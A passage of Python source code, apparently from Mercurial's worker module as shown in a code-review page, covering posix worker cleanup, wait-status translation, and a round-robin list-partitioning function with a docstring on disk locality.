        signal.signal(signal.SIGCHLD, oldchldhandler)
        status = problem[0]
        if status:
            if status < 0:
                # negative status means "killed by signal -status": send
                # the same signal to this process
                os.kill(os.getpid(), -status)
            sys.exit(status)
    try:
        for line in util.iterfile(fp):
            # each line is "<i> <item>\n": split once, strip the newline
            l = line.split(' ', 1)
            yield int(l[0]), l[1][:-1]
    except: # re-raises
        killworkers()
        cleanup()
        raise
    cleanup()
195 195
def _posixexitstatus(code):
    '''translate a posix wait status into the convention used by
    os.spawnv: the exit code for a normal exit, or the negated signal
    number when the process was terminated by a signal

    returns None if the process was stopped instead of exiting'''
    if os.WIFEXITED(code):
        return os.WEXITSTATUS(code)
    if os.WIFSIGNALED(code):
        return -os.WTERMSIG(code)
    # neither exited nor killed by a signal
    return None
205 205
# Bind the platform-specific implementations used by worker() and
# _posixworker(). Nothing is bound here on Windows.
# NOTE(review): presumably safe because _startupcost makes worthwhile()
# return False on non-posix platforms, so worker() never reaches
# _platformworker there -- confirm.
if not pycompat.iswindows:
    _platformworker = _posixworker
    _exitstatus = _posixexitstatus
209 209
def partition(lst, nslices):
    '''lazily split lst into nslices slices of roughly equal size

    Slice number i holds the elements at positions i, i + nslices,
    i + 2 * nslices, ... so the input is dealt out round-robin rather
    than cut into contiguous runs. If we ever write workers that need to
    preserve grouping in input we should consider allowing callers to
    specify a partition strategy.

    mpm is not a fan of this partitioning strategy when files are involved.
    In his words:

        Single-threaded Mercurial makes a point of creating and visiting
        files in a fixed order (alphabetical). When creating files in order,
        a typical filesystem is likely to allocate them on nearby regions on
        disk. Thus, when revisiting in the same order, locality is maximized
        and various forms of OS and disk-level caching and read-ahead get a
        chance to work.

        This effect can be quite significant on spinning disks. I discovered it
        circa Mercurial v0.4 when revlogs were named by hashes of filenames.
        Tarring a repo and copying it to another disk effectively randomized
        the revlog ordering on disk by sorting the revlogs by hash and suddenly
        performance of my kernel checkout benchmark dropped by ~10x because the
        "working set" of sectors visited no longer fit in the drive's cache and
        the workload switched from streaming to random I/O.

        What we should really be doing is have workers read filenames from a
        ordered queue. This preserves locality and also keeps any worker from
        getting more than one file out of balance.
    '''
    for offset in range(nslices):
        # every nslices-th element, starting at this slice's offset
        strided = lst[offset::nslices]
        yield strided
General Comments 0
You need to be logged in to leave comments. Login now